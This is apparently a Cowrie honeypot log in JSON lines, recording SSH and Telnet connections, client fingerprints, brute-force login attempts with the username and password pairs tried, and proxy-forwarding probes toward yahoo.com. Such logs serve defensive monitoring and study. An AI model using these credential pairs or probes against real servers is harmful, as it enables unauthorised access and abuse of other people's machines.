{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-26T03:09:48.582245Z","src_ip":"185.242.226.17","session":"5625c45cfadf"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:09:58.562069Z","src_ip":"185.242.226.17","session":"5625c45cfadf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54824,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffdf6632e5cc","protocol":"ssh","message":"New connection: 212.227.125.160:54824 (1.2.3.4:22) [session: ffdf6632e5cc]","sensor":"my-vps","timestamp":"2025-08-26T03:10:48.813401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:10:48.814334Z","src_ip":"212.227.125.160","session":"ffdf6632e5cc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:10:48.865022Z","src_ip":"212.227.125.160","session":"ffdf6632e5cc"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T03:10:49.016628Z","src_ip":"212.227.125.160","session":"ffdf6632e5cc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:10:50.068586Z","src_ip":"212.227.125.160","session":"ffdf6632e5cc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60792,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1f7546e39bd","protocol":"ssh","message":"New connection: 217.72.205.35:60792 (1.2.3.4:22) [session: a1f7546e39bd]","sensor":"my-vps","timestamp":"2025-08-26T03:10:52.725346Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:10:52.726602Z","src_ip":"217.72.205.35","session":"a1f7546e39bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40711,"dst_ip":"1.2.3.4","dst_port":23,"session":"80d001c80bca","protocol":"telnet","message":"New connection: 212.227.125.160:40711 (1.2.3.4:23) [session: 80d001c80bca]","sensor":"my-vps","timestamp":"2025-08-26T03:12:13.907259Z"}
{"eventid":"cowrie.session.closed","duration":31.355535984039307,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:12:45.262717Z","src_ip":"212.227.125.160","session":"80d001c80bca"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":36524,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeea8123b328","protocol":"ssh","message":"New connection: 93.123.109.181:36524 (1.2.3.4:22) [session: eeea8123b328]","sensor":"my-vps","timestamp":"2025-08-26T03:12:54.668189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:12:54.669147Z","src_ip":"93.123.109.181","session":"eeea8123b328"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:12:54.688392Z","src_ip":"93.123.109.181","session":"eeea8123b328"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv123","message":"login attempt [solv/solv123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:12:54.747401Z","src_ip":"93.123.109.181","session":"eeea8123b328"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:12:55.769214Z","src_ip":"93.123.109.181","session":"eeea8123b328"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40021,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dffda285d6b","protocol":"ssh","message":"New connection: 213.209.150.239:40021 (1.2.3.4:22) [session: 2dffda285d6b]","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.243492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.244289Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.291825Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.527193Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":21824,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21824","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.576324Z","session":"2dffda285d6b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.623948Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11614,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11614","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.761569Z","session":"2dffda285d6b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.809603Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:14:03.857690Z","src_ip":"213.209.150.239","session":"2dffda285d6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35192,"dst_ip":"1.2.3.4","dst_port":22,"session":"84f6516e1fa6","protocol":"ssh","message":"New connection: 212.227.235.229:35192 (1.2.3.4:22) [session: 84f6516e1fa6]","sensor":"my-vps","timestamp":"2025-08-26T03:15:14.051823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:15:14.629944Z","src_ip":"212.227.235.229","session":"84f6516e1fa6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:15:14.630607Z","src_ip":"212.227.235.229","session":"84f6516e1fa6"}
{"eventid":"cowrie.login.success","username":"root","password":"Amir1371","message":"login attempt [root/Amir1371] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:15:19.209935Z","src_ip":"212.227.235.229","session":"84f6516e1fa6"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:15:20.338296Z","src_ip":"212.227.235.229","session":"84f6516e1fa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1653,"dst_ip":"1.2.3.4","dst_port":22,"session":"926c0385d934","protocol":"ssh","message":"New connection: 212.227.235.229:1653 (1.2.3.4:22) [session: 926c0385d934]","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.261198Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.262313Z","src_ip":"212.227.235.229","session":"926c0385d934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1944,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bf0fdb6e794","protocol":"ssh","message":"New connection: 212.227.235.229:1944 (1.2.3.4:22) [session: 7bf0fdb6e794]","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.390343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.391230Z","src_ip":"212.227.235.229","session":"7bf0fdb6e794"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.520566Z","src_ip":"212.227.235.229","session":"7bf0fdb6e794"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:16:04.910492Z","src_ip":"212.227.235.229","session":"7bf0fdb6e794"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T03:16:05.041441Z","session":"7bf0fdb6e794"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:17:14.391330Z","src_ip":"212.227.235.229","session":"7bf0fdb6e794"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39960,"dst_ip":"1.2.3.4","dst_port":23,"session":"d39a0b483504","protocol":"telnet","message":"New connection: 212.227.235.229:39960 (1.2.3.4:23) [session: d39a0b483504]","sensor":"my-vps","timestamp":"2025-08-26T03:17:18.125078Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49974,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca70b941acfe","protocol":"ssh","message":"New connection: 217.72.205.35:49974 (1.2.3.4:22) [session: ca70b941acfe]","sensor":"my-vps","timestamp":"2025-08-26T03:17:30.212196Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:17:30.213303Z","src_ip":"217.72.205.35","session":"ca70b941acfe"}
{"eventid":"cowrie.session.closed","duration":13.396596670150757,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:17:31.521599Z","src_ip":"212.227.235.229","session":"d39a0b483504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56052,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b4156cfdb30","protocol":"ssh","message":"New connection: 212.227.125.160:56052 (1.2.3.4:22) [session: 9b4156cfdb30]","sensor":"my-vps","timestamp":"2025-08-26T03:18:34.124893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:18:34.126515Z","src_ip":"212.227.125.160","session":"9b4156cfdb30"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:18:34.177441Z","src_ip":"212.227.125.160","session":"9b4156cfdb30"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"12345678","message":"login attempt [ansible/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T03:18:34.331543Z","src_ip":"212.227.125.160","session":"9b4156cfdb30"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:18:35.384601Z","src_ip":"212.227.125.160","session":"9b4156cfdb30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54791,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b99da9d9781","protocol":"telnet","message":"New connection: 212.227.235.229:54791 (1.2.3.4:23) [session: 5b99da9d9781]","sensor":"my-vps","timestamp":"2025-08-26T03:19:18.293000Z"}
{"eventid":"cowrie.session.closed","duration":13.130499839782715,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:19:31.423428Z","src_ip":"212.227.235.229","session":"5b99da9d9781"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":52640,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd4a50e2c4d9","protocol":"ssh","message":"New connection: 139.19.117.131:52640 (1.2.3.4:22) [session: cd4a50e2c4d9]","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.881822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.883497Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.901201Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
